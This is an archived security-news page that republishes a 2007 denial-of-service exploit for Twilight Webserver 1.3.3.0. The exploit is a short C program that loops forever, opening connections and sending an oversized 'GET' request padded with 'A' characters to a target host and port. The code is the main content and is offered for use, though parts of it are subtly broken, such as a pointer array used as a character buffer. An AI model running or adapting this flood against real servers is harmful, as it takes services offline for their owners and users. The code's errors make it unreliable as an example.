_
_ _ 08.30.2008
 
_ Navigation: _
Main Page Technology Downloads Security Entertainment Videos
Search Site: Advanced
_
 
Login Login
 
Register Register
   
_ News Item

Twilight Webserver DoS (Exploit)

Jan 18 2007 13:17:12
Source: ace
vote bad  vote good
0
Summary
Twilight Webserver is a simple HTTP server for home use.

A vulnerability in Twilight WebServer allows for denial of service.

Credit:
The original article can be found at:
http://www.milw0rm.com/exploits/3138
Related article can be found at:
Twilight Utilities Denial of Service Vulnerability (TW-WebServer)


Vulnerable Systems:
* Twilight Webserver version 1.3.3.0

Exploit:
/****************************************************************************
* Denial of Service Attack against Twilight Webserver v1.3.3.0
* Author: H0tTurk-
*
* WebSite: http://www.twilightutilities.com
* Version: Twilight Webserver v1.3.3.0
* NewVersion: Tw 2.1
*
* Exploit: tw.c
* Compile: gcc twilight -o tw
* Contact:
* [-] Mail: hotturk@mynet.com
* [-] Web: http://www.ayyildiz.org

* [-] MSN: h0tturk@h0tturk.com
*****************************************************************************/

#include <stdio.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>

int main(int argc, char *argv[])
{
int sockfd;
struct sockaddr_in srv;
struct hostent *host;
char send[1052], *flood[1037], get[3] = "GET", http[12] = "HTTP/1.0\r\n";

memset(flood, 0x41, 1037);

strncpy(send, get, sizeof(send) -1);
strncat(send, flood, sizeof(send) - strlen(send) -1);
strncat(send, http, sizeof(send) - strlen(send) -1);

if(argc < 3)
{
printf("Usage: %s [target] <port>\n", argv[0]);
exit(0);
}

if((host = gethostbyname(argv[1])) == NULL)
{
printf("Unknown host!\n");
exit(0);
}

srv.sin_family = AF_INET;
srv.sin_port = htons(atoi(argv[2]));
srv.sin_addr.s_addr = inet_addr((char*)argv[1]);

printf("h0t against Twilight Webserver v1.3.3.0\n");

for(;;)
{
if( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
printf("Can't start socket()!\n"); exit(0);
}

if(connect(sockfd,(struct sockaddr*)&srv, sizeof(srv)) < 0)
{
printf("Connection to server broken!\n"); close(sockfd);
}

if(write(sockfd, send, strlen(send)) < 0)
{
break;
}

close(sockfd);
}

printf("Attack done!...\n");

return 0;
}

» full story @ source-link: ace
Related Articles:
» Xpression News 1.0.1 (archives.php) Remote File Disclosure Exploit
» S-Gastebuch <= 1.5.3 (gb_pfad) Remote File Include Exploit
» PHP-Nuke Module Emporium <= 2.3.0 Remote SQL Injection Exploit
» SendStudio <= 2004.14 (ROOTDIR) Remote File Inclusion Vulnerability
_ Comments
Add Comment
You must be registered and logged in to add comments!

Register
Login
_ Sponsors

_ Sponsors